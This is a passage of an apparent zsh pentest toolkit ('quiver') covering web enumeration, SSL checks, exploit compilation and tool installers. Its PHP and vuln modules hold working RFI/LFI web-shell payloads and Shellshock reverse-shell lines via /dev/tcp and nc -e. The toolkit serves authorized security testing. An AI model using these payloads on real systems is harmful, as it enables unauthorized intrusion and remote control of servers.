__pkgs curl seclists wordlists
qq-install-golang
go install github.com/ffuf/ffuf/v2@latest
go install github.com/tomnomnom/httprobe@latest
}
qq-enum-web-php-ffuf() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
__check-threads
local d && __askvar d "RECURSION DEPTH"
print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -e ${__EXT_PHP} -o $(__urlpath)/ffuf-dirs-php.csv -of csv"
}
qq-enum-web-php-rfi() {
__ask "URL should contain a URI like /page.php?rfi="
qq-vars-set-url
__ask "PAYLOAD URL should contain reverse php shell"
local p && __askvar p PAYLOAD_URL
print -z "curl -k -v -XGET \"${__URL}${p}%00\" "
}
qq-enum-web-php-rfi-input() {
__ask "URL should contain a URI like /page.php?rfi="
qq-vars-set-url
print -z "curl -k -v -XPOST --data \"<?php echo shell_exec('whoami'); ?>\" \"${__URL}php://input%00\" "
}
qq-enum-web-php-lfi-proc-self-environ() {
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
print -z "curl -k -v -A \"<?=phpinfo(); ?>\" \"${__URL}../../../proc/self/environ\" "
}
qq-enum-web-php-lfi-filter-resource(){
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
__ask "Set path to a remote file"
local f && __askvar f REMOTE_FILE
print -z "curl -k -v -XGET \"${__URL}php://filter/convert.base64-encode/resource=${f}\" "
}
qq-enum-web-php-lfi-zip-jpg-shell() {
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
__info "Created shell.jpg"
__warn "First upload shell.jpg to target"
print -z "curl -k -v -XGET \"${__URL}zip://shell.jpg%23payload.php?cmd=\" "
}
qq-enum-web-php-lfi-logfile() {
__ask "URL should contain a URI like /page.php?lfi="
qq-vars-set-url
local b && __askvar b "TARGET URL"
# no spaces in the payload: curl percent-encodes spaces, which would break the PHP logged in access.log
curl -s "${b}/<?=passthru(\$_GET['cmd']);?>"
__info "lfi request completed"
print -z "curl -k -v \"${__URL}../../../../../var/log/apache2/access.log&cmd=whoami\" "
}
qq-enum-web-php-gen-htaccess() {
local e && __askvar e Extension
__ask "Upload .htaccess file to make alt extension executable by PHP"
print -z "echo \"AddType application/x-httpd-php ${e}\" > .htaccess"
}
qq-enum-web-php-phpinfo() {
print -z "echo \"<html><body><p>PHP INFO PAGE</p><br /><?php phpinfo(); ?></body></html>\" > phpinfo.php"
}
================================================
FILE: modules/qq-enum-web-ssl.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-ssl
#############################################################
qq-enum-web-ssl-help() {
cat << "DOC"
qq-enum-web-ssl
----------------
The qq-enum-web-ssl namespace contains commands for enumerating SSL/TLS.
Commands
--------
qq-enum-web-ssl-install: installs dependencies
qq-enum-web-ssl-tcpdump: capture traffic to and from target
qq-enum-web-ssl-der-to-crt: convert a .der file to .crt
qq-enum-web-ssl-crt-ca-install: install a root certificate (.crt)
qq-enum-web-ssl-certs: display cert from a url
qq-enum-web-ssl-cert-download: download certs from a url
qq-enum-web-ssl-testssl-full: run a full testssl scan against a url
qq-enum-web-ssl-testssl-ciphers: enumerate supported ciphers with testssl
DOC
}
qq-enum-web-ssl-install() {
__info "Running $0..."
__pkgs curl nmap tcpdump openssl testssl.sh
}
qq-enum-web-ssl-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 443 -w $(__hostpath)/ssl.pcap"
}
qq-enum-web-ssl-der-to-crt() {
__ask "Select the cacert.der file"
local f && __askpath f FILE $(pwd)
print -z "openssl x509 -inform DER -in ${f} -out cacert.crt"
}
qq-enum-web-ssl-crt-ca-install() {
__ask "Select the cacert.crt file"
local f && __askpath f FILE $(pwd)
print -z "sudo cp ${f} /usr/local/share/ca-certificates/. && sudo update-ca-certificates"
}
qq-enum-web-ssl-certs() {
qq-vars-set-url
local d=$(echo "${__URL}" | cut -d/ -f3)
print -z "openssl s_client -showcerts -servername ${d} -connect ${d}:443 </dev/null"
}
qq-enum-web-ssl-cert-download() {
__check-project
qq-vars-set-url
local d=$(echo "${__URL}" | cut -d/ -f3)
print -z "openssl s_client -servername ${d} -connect ${d}:443 </dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > $(__urlpath)/ssl.certificate.$(date +"%Y%m%d-%H%M%S").pem"
}
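`openssl s_client -connect` wants `host:port`, not a URL, and the `cut -d/ -f3` used above keeps any `:port` attached to the host name and fails for a URL written without a scheme. As an added example that is not quiver's code, here are POSIX shell helpers that split a URL into host and port with parameter expansion alone and build the certificate download command; the function names are assumptions of this example, and bracketed IPv6 literals are not handled.

```bash
#!/bin/sh
# Added example, not quiver's own code: derive host and port from a URL
# for openssl s_client using only shell parameter expansion. Handles
# http://, https://, no scheme, user:pass@ userinfo, :port and a path.
# Bracketed IPv6 literals are not handled.

# url_authority URL: the host[:port] part with scheme, userinfo and path removed.
url_authority() {
    local rest
    rest=${1#*://}          # drop "scheme://" if present
    rest=${rest%%/*}        # drop "/path..."
    rest=${rest#*@}         # drop "user:pass@"
    printf '%s' "$rest"
}

# url_host URL: host name without the port.
url_host() {
    local a
    a=$(url_authority "$1")
    printf '%s' "${a%%:*}"
}

# url_port URL: explicit port if given, else 80 for http:// and 443 otherwise.
url_port() {
    local a
    a=$(url_authority "$1")
    case $a in
        *:*) printf '%s' "${a##*:}" ;;
        *)   case $1 in http://*) printf '80' ;; *) printf '443' ;; esac ;;
    esac
}

# ssl_cert_download_cmd URL OUTFILE: the s_client pipeline that saves the
# served certificate chain (-showcerts) as PEM. The command is printed,
# not executed, mirroring the module's print -z style so it can be
# reviewed first.
ssl_cert_download_cmd() {
    local host port
    host=$(url_host "$1")
    port=$(url_port "$1")
    printf '%s' "openssl s_client -showcerts -servername $host -connect $host:$port </dev/null 2>/dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > $2"
}

# Usage:
ssl_cert_download_cmd "https://example.com:8443/login" chain.pem
echo
```

`-servername` matters on shared hosting: without SNI the server may hand back a default certificate rather than the one for the host being tested.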
qq-enum-web-ssl-testssl-full() {
__check-project
qq-vars-set-url
print -z "testssl --color=3 -oA $(__urlpath)/testssl.full.`date +"%Y%m%d-%H%M%S"` ${__URL} "
}
qq-enum-web-ssl-testssl-ciphers() {
__check-project
qq-vars-set-url
print -z "testssl -E --color=3 -oA $(__urlpath)/testssl.ciphers.`date +"%Y%m%d-%H%M%S"` ${__URL} "
}
================================================
FILE: modules/qq-enum-web-vuln.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-vuln
#############################################################
qq-enum-web-vuln-help() {
cat << "DOC"
qq-enum-web-vuln
----------------
The qq-enum-web-vuln namespace contains commands for discovering web vulnerabilities.
Commands
--------
qq-enum-web-vuln-install: installs dependencies
qq-enum-web-vuln-nikto: scan a target for web vulnerabilities
qq-enum-web-vuln-nmap-rfi: scan for potential rfi uri's
qq-enum-web-vuln-shellshock-agent: create a shellshock payload for user-agent
qq-enum-web-vuln-shellshock-nc: attempt shellshock with a reverse shell payload
qq-enum-web-vuln-put-curl: attempt to PUT a file with curl
qq-enum-web-vuln-padbuster-check: test for padbuster
qq-enum-web-vuln-padbuster-forge: exploit with padbuster
DOC
}
qq-enum-web-vuln-install() {
__info "Running $0..."
__pkgs nikto curl nmap padbuster
}
qq-enum-web-vuln-nikto() {
__check-project
qq-vars-set-url
print -z "nikto -useragent \"${__UA}\" -h \"${__URL}\" -o $(__urlpath)/nikto.txt"
}
qq-enum-web-vuln-nmap-rfi() {
qq-vars-set-rhost
print -z "nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' ${__RHOST}"
}
qq-enum-web-vuln-shellshock-agent() {
qq-vars-set-lhost
qq-vars-set-lport
__ok "Copy the header value below to use in your exploit"
cat << DOC
User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${__LHOST}/${__LPORT} 0>&1
DOC
}
qq-enum-web-vuln-shellshock-nc() {
qq-vars-set-lhost
qq-vars-set-lport
qq-vars-set-rhost
__warn "Start a netcat listener for ${__LHOST}:${__LPORT}"
print -z "curl -A '() { :; }; /bin/bash -c \"/usr/bin/nc ${__LHOST} ${__LPORT} -e /bin/bash\"' \"http://${__RHOST}/cgi-bin/status\""
}
qq-enum-web-vuln-put-curl() {
qq-vars-set-rhost
local f && __askpath f FILE $(pwd)
print -z "curl -L -T ${f} \"http://${__RHOST}/$(basename ${f})\" "
}
qq-enum-web-vuln-padbuster-check() {
qq-vars-set-url
local cn && __askvar cn "COOKIE NAME"
local cv && __askvar cv "COOKIE VALUE"
__info "Block size 8 is assumed (DES/3DES); use 16 for AES"
print -z "padbuster ${__URL} ${cv} 8 -cookies ${cn}=${cv} -encoding 0"
}
qq-enum-web-vuln-padbuster-forge() {
qq-vars-set-url
local cn && __askvar cn "COOKIE NAME"
local cv && __askvar cv "COOKIE VALUE"
__check-user
print -z "padbuster ${__URL} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${__USER}"
}
================================================
FILE: modules/qq-enum-web.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web
#############################################################
qq-enum-web-help() {
cat << "DOC"
qq-enum-web
-----------
The qq-enum-web namespace contains commands for scanning and enumerating
http services.
Commands
--------
qq-enum-web-install: installs dependencies
qq-enum-web-tcpdump: capture traffic to and from a host
qq-enum-web-nmap-sweep: nmap sweep scan to discover web servers on a network
qq-enum-web-whatweb: enumerate web server and platform information
qq-enum-web-waf: enumerate WAF information
qq-enum-web-vhosts-gobuster: brute force for virtual hosts
qq-enum-web-eyewitness: scrape screenshots from target URL
qq-enum-web-wordpress: enumerate Wordpress information
qq-enum-web-headers: grab headers from a target url using curl
qq-enum-web-mirror: mirrors the target website locally
qq-enum-web-gospider: crawl the target url with gospider
qq-enum-web-hakrawler: crawl the target url with hakrawler
DOC
}
qq-enum-web-install() {
__info "Running $0..."
__pkgs tcpdump nmap whatweb wafw00f gobuster eyewitness wpscan wget curl seclists wordlists
go install github.com/jaeles-project/gospider@latest
go install github.com/hakluke/hakrawler@latest
}
qq-enum-web-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p80,443,8080 ${__NETWORK} -oA $(__netpath)/web-sweep"
}
qq-enum-web-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 80 -w $(__hostpath)/web.pcap"
}
qq-enum-web-whatweb() {
__check-project
qq-vars-set-url
print -z "whatweb ${__URL} -a 3 | tee $(__urlpath)/whatweb.txt"
}
qq-enum-web-waf() {
__check-project
qq-vars-set-url
print -z "wafw00f ${__URL} -o $(__urlpath)/waf.txt"
}
# vhosts
qq-enum-web-vhosts-gobuster() {
__check-project
qq-vars-set-url
local w && __askpath w FILE /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt
__check-threads
print -z "gobuster vhost -u ${__URL} -w ${w} -a \"${__UA}\" -t ${__THREADS} -o $(__urlpath)/vhosts.txt"
}
# screens
qq-enum-web-eyewitness() {
__check-project
qq-vars-set-url
mkdir -p $(__urlpath)/screens
print -z "eyewitness --web --no-dns --no-prompt --single ${__URL} -d $(__urlpath)/screens --user-agent \"${__UA}\" "
}
# apps
qq-enum-web-wordpress() {
__check-project
qq-vars-set-url
print -z "wpscan --ua \"${__UA}\" --url ${__URL} --enumerate tt,vt,u,vp -o $(__urlpath)/wpscan.txt"
}
qq-enum-web-headers() {
__check-project
qq-vars-set-url
print -z "curl -s -X GET -I -L -A \"${__UA}\" \"${__URL}\" | tee $(__urlpath)/headers.txt"
}
qq-enum-web-mirror() {
__warn "The destination site will be mirrored in the current directory"
qq-vars-set-url
print -z "wget -mkEpnp ${__URL} "
}
qq-enum-web-gospider() {
__check-project
qq-vars-set-url
# quote the URL with escaped quotes (nested plain quotes ended the string early); gospider -o takes an output folder, not a file
print -z "gospider -s \"${__URL}\" -o $(__urlpath)/gospider"
}
qq-enum-web-hakrawler() {
__check-project
qq-vars-set-url
local d && __askvar d DEPTH
print -z "hakrawler -url \"${__URL}\" -depth ${d} -linkfinder -usewayback | tee $(__urlpath)/hakrawler.txt"
}
================================================
FILE: modules/qq-exploit.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-exploit
#############################################################
qq-exploit-help() {
cat << "DOC"
qq-exploit
----------
The exploit namespace provides commands that assist with compilation and
cross-compilation commands for exploits.
Commands
--------
qq-exploit-install: installs dependencies
qq-exploit-searchsploit-nmap: use searchsploit with an nmap xml results file
qq-exploit-compile-gcc: compile a linux exploit
qq-exploit-compile-gcc-32: compile a 32-bit linux exploit on a 64-bit host
qq-exploit-compile-c-win32: cross compile a C win32 exploit
qq-exploit-compile-c-win64: cross compile a C win64 exploit
qq-exploit-compile-c++-win32: cross compile a C++ win32 exploit
qq-exploit-compile-c++-win64: cross compile a C++ win64 exploit
DOC
}
qq-exploit-install() {
__info "Running $0..."
sudo dpkg --add-architecture i386
sudo apt-get update
__pkgs exploitdb
__pkgs mingw-w64 gcc gcc-multilib g++-multilib
}
qq-exploit-searchsploit-nmap() {
__check-project
__ask "Select nmap xml scan results file"
local f && __askpath f FILE ${__PROJECT}
print -z "searchsploit -x --nmap ${f}"
}
qq-exploit-compile-gcc() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "gcc -o ${out} ${src}"
}
qq-exploit-compile-gcc-32() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "gcc -m32 -o ${out} ${src}"
}
qq-exploit-compile-c-win32() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "i686-w64-mingw32-gcc ${src} -o ${out}"
}
qq-exploit-compile-c-win64() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "x86_64-w64-mingw32-gcc ${src} -o ${out}"
}
qq-exploit-compile-c++-win32() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "i686-w64-mingw32-g++ ${src} -o ${out}"
}
qq-exploit-compile-c++-win64() {
__check-project
mkdir -p ${__PROJECT}/exploits
local src && __askpath src SOURCE ${__PROJECT}/exploits
local out && __askpath out OUTPUT ${__PROJECT}/exploits
print -z "x86_64-w64-mingw32-g++ ${src} -o ${out}"
}
qq-exploit-compile-notes-winsock() {
__info "use -lws2_32"
}
qq-exploit-compile-notes-static() {
__info "-static-libstdc++"
__info "-static-libgcc"
}
================================================
FILE: modules/qq-install.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-install
#############################################################
qq-install-help() {
cat << "DOC"
qq-install
----------
The qq-install namespace provides commands that assist with installing
packages, repos and tools used in quiver.
Commands
--------
qq-install-all: Installs all dependencies in all modules, calling qq-*-install
qq-install-git-pull-tools: Updates all installed tools that are git repos
qq-install-dev: Installs python3, php, npm and libraries
qq-install-essentials: Installs useful utilities
qq-install-golang: Installs golang and environment variables needed for "go get"
Tools
-----
These installers are for individual tools.
qq-install-wordlist-commonspeak
qq-install-wordlist-nerdlist
qq-install-massdns
qq-install-github-search
qq-install-s3scanner
qq-install-git-secrets
qq-install-gitrob
qq-install-pentest-tools
qq-install-protonvpn
qq-install-nmap-elasticsearch-nse
qq-install-link-finder
qq-install-bat
DOC
}
##### Helpers
__addpath() {
echo "export PATH=\$PATH:$1" | tee -a ~/.zshrc
export PATH=$PATH:$1
}
__pkgs(){
__info "checking for and installing dependencies..."
for pkg in "$@"
do
__info "$pkg"
dpkg -l | grep -qw $pkg && __warn "already installed" || sudo apt-get -y install $pkg
done
}
qq-install-all() {
__cyan "This will install/update all modules."
__cyan "Ensure you have free disk space before proceeding."
__ask "CONTINUE?"
if __check-proceed
then
__info "Installing all modules..."
#qq-encoding-install
qq-enum-dhcp-install
qq-enum-dns-install
qq-enum-ftp-install
qq-enum-host-install
qq-enum-kerb-install
qq-enum-ldap-install
qq-enum-mssql-install
qq-enum-mysql-install
qq-enum-network-install
qq-enum-nfs-install
qq-enum-oracle-install
qq-enum-pop3-install
qq-enum-rdp-install
qq-enum-smb-install
qq-enum-web-aws-install
qq-enum-web-dirs-install
qq-enum-web-elastic-install
qq-enum-web-fuzz-install
qq-enum-web-js-install
qq-enum-web-vuln-install
qq-enum-web-php-install
qq-enum-web-ssl-install
qq-enum-web-install
qq-exploit-install
#qq-kali-install
qq-notes-install
qq-log-install
qq-pivot-install
qq-project-install
qq-recon-domains-install
qq-recon-github-install
qq-recon-networks-install
qq-recon-org-install
qq-recon-subs-install
qq-shell-handlers-msf-install
qq-shell-handlers-install
#qq-shell-tty-install
qq-srv-install
__info "Install finished"
fi
}
qq-install-git-pull-tools() {
__cyan "This will git-pull all repos in ${__TOOLS}."
__ask "CONTINUE?"
if __check-proceed
then
cd ${__TOOLS}
for d in $(ls -d */)
do
cd $d
__ok "Pulling ${d}"
git pull
cd -
done
cd ${__TOOLS}
fi
}
qq-install-dev(){
__cyan "This will install python3, php, npm and libraries."
__ask "CONTINUE?"
if __check-proceed
then
__pkgs python3 python3-pip php php-curl libldns-dev libssl-dev libcurl4-openssl-dev npm
fi
}
qq-install-essentials(){
__cyan "This will install common utilities such as jq, tmux, tree, dtach and more."
__ask "CONTINUE?"
if __check-proceed
then
__pkgs jq pigz fonts-powerline unzip tmux dtach tree
fi
}
##### Individual Tools
qq-install-golang() {
__pkgs golang
if [[ -z "$GOPATH" ]]
then
echo "export GOPATH=\$HOME/go" | tee -a $HOME/.zshrc
echo "export PATH=\$PATH:/usr/local/go/bin:\$GOPATH/bin" | tee -a $HOME/.zshrc
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$HOME/go/bin
fi
}
qq-install-node() {
__pkgs nodejs npm
cd $HOME
mkdir -p $HOME/.npm-global
npm config set prefix '~/.npm-global'
# npm places global binaries under <prefix>/bin, so that is the directory to add to PATH
if ! echo "$PATH" | grep -q "npm-global/bin"
then
echo "export PATH=\$PATH:\$HOME/.npm-global/bin" | tee -a $HOME/.zshrc
export PATH=$PATH:$HOME/.npm-global/bin
fi
}
qq-install-wordlist-commonspeak() {
local name="commonspeak2"
local url="https://github.com/assetnote/commonspeak2-wordlists.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
else
__warn "already installed in $p"
pushd $p
git pull
popd
fi
}
qq-install-wordlist-nerdlist() {
local name="nerdlist"
local url="https://github.com/tarahmarie/nerdlist.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
else
__warn "already installed in $p"
pushd $p
git pull
popd
fi
}
qq-install-massdns() {
local name="massdns"
local url="https://github.com/blechschmidt/massdns.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
make
popd
__addpath $p/bin
else
__warn "already installed in $p"
pushd $p
git pull
make
popd
fi
}
qq-install-github-search() {
local name="github-search"
local url="https://github.com/gwen001/github-search.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
pip3 install -r requirements.txt
popd
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
pip3 install -r requirements.txt
popd
fi
}
qq-install-s3scanner() {
local name="S3Scanner"
local url="https://github.com/sa7mon/S3Scanner.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
pip3 install -r requirements.txt
popd
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
pip3 install -r requirements.txt
popd
fi
}
qq-install-gf() {
local name="gf"
__info "$name"
go get -u github.com/tomnomnom/gf
echo "source \$GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh" >> $HOME/.zshrc
cp -r $GOPATH/src/github.com/tomnomnom/gf/examples $HOME/.gf
}
qq-install-git-secrets() {
local name="git-secrets"
local url="https://github.com/awslabs/git-secrets.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
sudo make install
popd
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
sudo make install
popd
fi
}
qq-install-gitrob() {
local name="gitrob"
__info "$name"
go get -u github.com/golang/dep/cmd/dep
go get -u github.com/codeEmitter/gitrob
pushd ~/go/src/github.com/codeEmitter/gitrob
dep ensure
go build
popd
}
qq-install-pentest-tools() {
local name="pentest-tools"
local url="https://github.com/gwen001/pentest-tools.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
__addpath $p
else
__warn "already installed in $p"
pushd $p
git pull
popd
fi
}
qq-install-protonvpn() {
local name="protonvpn"
__info "$name"
sudo apt install -y openvpn dialog python3-pip python3-setuptools
sudo pip3 install protonvpn-cli
__warn "ProtonVPN username and password required"
print -z "sudo protonvpn init"
}
qq-install-nmap-elasticsearch-nse() {
local name="nmap-elasticsearch-nse"
local url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
sudo cp elasticsearch.nse /usr/share/nmap/scripts/
popd
else
__warn "already installed in $p"
pushd $p
git pull
sudo cp elasticsearch.nse /usr/share/nmap/scripts/
popd
fi
}
qq-install-link-finder() {
local name="LinkFinder"
local url="https://github.com/GerbenJavado/LinkFinder.git"
local p="$__TOOLS/$name"
__info "$name"
if [[ ! -d $p ]]
then
git clone $url $p
#after commands
pushd $p
sudo python3 setup.py install
pip3 install -r requirements.txt
popd
else
__warn "already installed in $p"
pushd $p
git pull
sudo python3 setup.py install
pip3 install -r requirements.txt
popd
fi
}
qq-install-bat() {
local name="bat"
__info "$name"
cd $HOME
wget https://github.com/sharkdp/bat/releases/download/v0.15.0/bat_0.15.0_amd64.deb
sudo dpkg -i bat_0.15.0_amd64.deb
rm bat_0.15.0_amd64.deb
cd -
}
================================================
FILE: modules/qq-kali.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-kali
#############################################################
qq-kali-help() {
cat << "DOC"
qq-kali
-------
The qq-kali namespace provides commands that assist with managing Kali linux.
Commands
--------
qq-kali-pkg-upgrade: update and full-upgrade with autoremove
qq-kali-pkg-query: query if a package is installed or not
qq-kali-pkg-fix: fix broken packages
qq-kali-pkg-go-update: update go modules and packages with go get
qq-kali-fs-mounted: show mounted file systems
qq-kali-fs-usage: show file system usage totals
qq-kali-fs-last3: show files modified in last 3 days in /etc
qq-kali-fs-large: show files larger than 1GB in the root fs
qq-kali-mem-top10: show top10 processes by memory usage
qq-kali-mem-free: show overall memory usage
qq-kali-disk-top10: show top 10 files by size in current directory
qq-kali-ps-tree: show a process tree
qq-kali-ps-grep: search list of processes
qq-kali-ps-dtach: run a script in the background
qq-kali-net-watch: display network active connections
qq-kali-net-open4: display open network connections ipv4
qq-kali-net-open6: display open network connections ipv6
qq-kali-net-routes: display the system routing table
qq-kali-net-ss: display open network connections
qq-kali-net-lsof: display open network connections
qq-kali-net-pubip: query for the public IP
qq-kali-pvpn-update: install or update proton vpn cli
qq-kali-pvpn-status: check proton vpn status
qq-kali-pvpn-connect-tcp: connect to proton vpn using tcp
qq-kali-pvpn-connect-udp: connect to proton vpn using udp
qq-kali-pvpn-disconnect: disconnect proton vpn
qq-kali-path-add: add a new path to the PATH environment variable
qq-kali-file-replace: replace an existing value in a file
qq-kali-file-dos-to-unix: convert file with dos endings to unix
qq-kali-file-unix-to-dos: convert file with unix endings to dos
qq-kali-file-sort-uniq: sort a file uniq in place
qq-kali-file-sort-uniq-ip: sort a file of IP addresses uniq in place
qq-kali-sudoers-easy: removes the requirement for sudo for common commands like nmap
qq-kali-sudoers-harden: removes sudo exclusions
DOC
}
qq-kali-pkg-upgrade() { print -z "sudo apt-get update && sudo apt-get full-upgrade && sudo apt-get autoremove" }
qq-kali-pkg-query() {
local query && __askvar query PACKAGE
for pkg in "${query}"
do
dpkg -l | grep -qw $pkg && __ok "${pkg} is installed" || __warn "${pkg} not installed"
done
}
qq-kali-pkg-fix() { print -z "sudo apt-get install --fix-broken && sudo apt-get autoremove && sudo apt-get update" }
qq-kali-pkg-go-update() { print -z "go get -u all" }
qq-kali-fs-mounted() { print -z "sudo mount | column -t" }
qq-kali-fs-usage() { print -z "df -mTh --total" }
qq-kali-fs-last3() { print -z "sudo find /etc -mtime -3" }
qq-kali-fs-large() { print -z "sudo find / -type f -size +1G" }
qq-kali-mem-top10() { print -z "sudo ps aux | sort -rk 4,4 | head -n 10 | awk '{print \$4,\$11}' " }
qq-kali-mem-free() { print -z "free -th" }
qq-kali-disk-top10() { print -z "sudo du -sk ./* | sort -r -n | head -10" }
qq-kali-ps-tree() { print -z "ps auxf" }
qq-kali-ps-grep() {
local query && __askvar query QUERY
print -z "ps aux | grep -v grep | grep -i -e VSZ -e ${query}"
}
qq-kali-ps-dtach() {
__ask "Enter full path to script to run dtach'd"
local p && __askpath p PATH $(pwd)
dtach -A ${p} /bin/zsh
}
qq-kali-net-watch() { print -z "sudo watch -n 0.3 'netstat -pantlu4 | grep \"ESTABLISHED\|LISTEN\"' " }
qq-kali-net-open4() { print -z "sudo netstat -pantlu4" }
qq-kali-net-open6() { print -z "sudo netstat -pantlu6" }
qq-kali-net-routes() { print -z "netstat -r --numeric-hosts" }
qq-kali-net-ss() { print -z "sudo ss -plaunt4" }
qq-kali-net-lsof() { print -z "sudo lsof -P -i -n " }
qq-kali-net-pubip() { print -z "curl -s \"https://icanhazip.com\" " }
qq-kali-pvpn-update() { print -z "sudo pip3 install protonvpn-cli --upgrade" }
qq-kali-pvpn-status() { print -z "sudo protonvpn status" }
qq-kali-pvpn-connect-tcp() { print -z "sudo protonvpn c -f" }
qq-kali-pvpn-connect-udp() { print -z "sudo protonvpn c -f -p udp" }
qq-kali-pvpn-disconnect() { print -z "sudo protonvpn disconnect" }
qq-kali-path-add() {
__ask "Enter new path to append to current PATH"
local p && __askpath p PATH /
print -z "echo \"export PATH=\$PATH:${p}\" | tee -a $HOME/.zshrc"
}
qq-kali-file-replace() {
local replace && __askvar replace REPLACE
local with && __askvar with WITH
local file && __askpath file FILE $(pwd)
# edit in place: redirecting output to the input file would truncate it before sed reads it
print -z "sed -i 's/${replace}/${with}/g' ${file}"
}
qq-kali-file-dos-to-unix() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "tr -d \"\015\" < ${file} > ${file}.unix"
}
qq-kali-file-unix-to-dos() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "sed -e 's/$/\r/' ${file} > ${file}.dos"
}
qq-kali-file-sort-uniq() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "cat ${file} | sort -u -o ${file}"
}
qq-kali-file-sort-uniq-ip() {
local file=$1
[[ -z "${file}" ]] && __askpath file FILE $(pwd)
print -z "cat ${file} | sort -u | sort -V -o ${file}"
}
qq-kali-sudoers-easy() {
__warn "This is dangerous for OPSEC! Remove when done."
print -z "echo \"$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan, /usr/sbin/tcpdump\" | sudo tee /etc/sudoers.d/$(whoami)"
}
alias easymode="qq-kali-sudoers-easy"
qq-kali-sudoers-harden() {
print -z "sudo rm /etc/sudoers.d/$(whoami)"
}
alias hardmode="qq-kali-sudoers-harden"
================================================
FILE: modules/qq-log.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-log
#############################################################
qq-log-help() {
cat << "DOC"
qq-log
------
The log namespace provides commands that create a logbook in
a directory specified by the __LOGBOOK variable. Use qq-log to append entries
to the logbook. Display the log with qq-log-cat. Edit the log
with qq-log-edit.
Commands
--------
qq-log-install: installs dependencies
qq-log: alias ql, appends $@ to an entry in the logbook
qq-log-cat: alias qlc, cats the logbook
qq-log-edit: alias qle, edits the logbook using $EDITOR
qq-log-set: creates or uses existing logbook.md in the path specified
DOC
}
qq-log-install() {
__info "Running $0..."
qq-install-golang
go get -u github.com/charmbracelet/glow
}
qq-log-set() {
qq-vars-set-logbook
}
alias qls="qq-log-set"
qq-log-cat() {
__check-logbook
__info "${__LOGBOOK}"
glow ${__LOGBOOK}
}
alias qlc="qq-log-cat"
qq-log-edit() {
__check-logbook
$EDITOR ${__LOGBOOK}
}
alias qle="qq-log-edit"
qq-log() {
__check-logbook
local stamp=$(date +'%m-%d-%Y : %r')
echo "## ${stamp}" >> ${__LOGBOOK}
echo "\`\`\`" >> ${__LOGBOOK}
echo "$@" >> ${__LOGBOOK}
echo "\`\`\`" >> ${__LOGBOOK}
echo " " >> ${__LOGBOOK}
}
alias ql="qq-log"
================================================
FILE: modules/qq-notes.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-notes
#############################################################
qq-notes-help() {
cat << "DOC"
qq-notes
--------
The notes namespace provides searching and reading of markdown notes that are
stored in a directory specified by the __NOTES environment variable (qq-vars-global).
Commands
--------
